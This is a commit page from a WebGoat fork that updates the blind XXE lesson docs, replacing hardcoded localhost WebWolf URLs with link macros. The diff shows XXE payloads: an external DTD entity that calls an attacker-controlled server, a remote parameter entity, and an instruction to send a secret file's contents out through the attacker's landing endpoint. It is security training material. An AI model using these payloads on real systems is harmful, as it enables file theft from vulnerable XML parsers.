dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

XXE lesson not showing correct link for WebWolf

Browse Source
This commit is contained in:
Nanne Baars
2018-05-01 21:54:28 +02:00
parent 11ffa5702c
commit 8050a2b56d
4 changed files with 21 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
View File

@ -1,4 +1,3 @@
== Blind XXE
In some cases you will see no output because although your attack might have worked the field is not reflected in the output of page.
@ -6,25 +5,25 @@ Or the resource you are trying to read contains illegal XML character which caus
Let's start with an example, in this case we reference an external DTD which we control on our own server.
As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example
use this server to ping it using `http://localhost:8081/ping?text=HelloWorld
use this server to ping it using `webWolfLink:landing[noLink]`
How do we use this endpoint to verify whether we can perform XXE?
We can again use WebWolf to host a file called `attack.dtd`, create this file with the following contents:
[source]
[source, subs="macros, specialcharacters"]
----
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM 'http://localhost:8081/ping?text=HelloWorld'>
<!ENTITY ping SYSTEM 'webWolfLink:landing[noLink]'>
----
Now submit the form change the xml using to:
[source]
[source, subs="macros, specialcharacters"]
----
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://localhost:8081/WebWolf/files/attack.dtd">
<!ENTITY % remote SYSTEM "webWolfLink:files/attack.dtd[noLink]">
%remote;
]>
<comment>

2
webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
View File

@ -18,6 +18,6 @@ DTD.
|`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|===
Try to upload this file using WebWolf landing page for example: `http://localhost:8081/WebWolf/landing?text=[contents_file]`
Try to upload this file using WebWolf landing page for example: `webWolfLink:landing?text=contents_file[noLink]`
(NOTE: this endpoint is under your full control)
Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.